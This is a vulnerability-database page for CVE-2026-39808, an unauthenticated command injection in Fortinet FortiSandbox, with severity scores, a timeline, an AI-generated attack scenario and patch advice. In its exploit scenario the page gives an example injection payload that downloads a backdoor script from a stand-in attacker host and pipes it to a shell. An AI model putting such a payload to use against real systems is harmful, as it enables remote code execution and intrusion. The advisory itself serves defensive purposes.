Skip to main content

Fortinet CVE-2026-39808

| EUVD-2026-22338 CRITICAL
OS Command Injection (CWE-78)
2026-04-14 fortinet GHSA-wfjv-vrx5-2cf2
Fortinet Command Injection
9.8
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ENISA EUVD
HIGH
qualitative

Primary rating from NVD.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

8
PoC Detected
Apr 22, 2026 - 14:17 vuln.today
Public exploit code
Analysis Updated
Apr 17, 2026 - 15:34 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Apr 17, 2026 - 15:22 vuln.today
cvss_changed
Analysis Generated
Apr 14, 2026 - 17:02 vuln.today
CVSS changed
Apr 14, 2026 - 16:22 NVD
9.1 (CRITICAL) 9.8 (CRITICAL)
EUVD ID Assigned
Apr 14, 2026 - 16:00 euvd
EUVD-2026-22338
Analysis Generated
Apr 14, 2026 - 16:00 vuln.today
CVE Published
Apr 14, 2026 - 15:38 nvd
CRITICAL 9.8

DescriptionCVE.org

A improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSandbox 4.4.0 through 4.4.8 may allow attacker to execute unauthorized code or commands via <insert attack vector here>

Articles & Coverage 1

POC CVE-2026-39808: Unauthenticated RCE in FortiSandbox 4.4.0-4.4.8 Apr 15, 2026

AnalysisAI

OS command injection in Fortinet FortiSandbox 4.4.0-4.4.8 and FortiSandbox PaaS versions 21.3-23.4 enables remote unauthenticated attackers to execute arbitrary system commands with complete system compromise. CVSS 9.8 (network, low complexity, no privileges) but EPSS 0.29% (53rd percentile) suggests limited real-world exploitation observed despite maximum severity score. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify exposed FortiSandbox interface
Delivery
Send crafted HTTP request with command injection payload
Exploit
Execute arbitrary OS commands as system user
Execution
Establish persistent backdoor access
Impact
Exfiltrate threat intelligence data
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Network-reachable FortiSandbox management interface on affected versions (4.4.0-4.4.8 or PaaS 21.3-23.4). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Contradictory risk signals require careful interpretation. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario Remote attacker identifies internet-exposed FortiSandbox management interface through Shodan or targeted reconnaissance. Attacker crafts malicious HTTP request to vulnerable endpoint, injecting shell metacharacters (e.g., '; wget http://attacker.com/backdoor.sh | sh #') into insufficiently validated parameter. …
Remediation Apply Fortinet-released patches per advisory FG-IR-26-100 (https://fortiguard.fortinet.com/psirt/FG-IR-26-100). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: identify all FortiSandbox deployments and document affected versions (4.4.0-4.4.8, PaaS 21.3-23.4); isolate affected instances from production networks where feasible. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-39808 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy